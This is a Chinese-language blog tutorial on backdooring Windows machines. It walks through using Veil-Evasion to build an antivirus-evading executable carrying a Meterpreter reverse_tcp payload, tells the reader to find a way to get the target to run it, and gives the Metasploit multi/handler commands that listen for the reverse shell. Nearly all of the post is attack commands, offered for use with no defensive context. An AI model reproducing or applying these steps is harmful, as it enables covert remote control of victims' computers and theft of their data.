Metasploit使用后门程序渗透Windows

3 篇文章 0 订阅

终端中运行  veil-evasion

输入list查看可用模块 

这里使用    7)      c/shellcode_inject/flatc

输入 use 7

generate

1 (default)

回车选择默认的 windows/meterpreter/reverse_tcp

tab 选择本地IP 也可以自己输入指定IP

端口 用默认的 4444

回车 回车

Generating shellcode...   等待

指定 文件名

/usr/share/veil-output/compiled/   在此位置找到所生成的exe文件  想方法使目标机运行

启动msf  (msfconsole)

加载exploit/multi/handler模块: use exploit/multi/handler

设定 payload: set payload windows/meterpreter/reverse_tcp

show options 查看所需设置的参数

set LHOST 你的IP (需与 veil操作中所指定的IP相同)

exploit  开始监听



设置本地主机;然后开始监听:exploit -z -j :


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值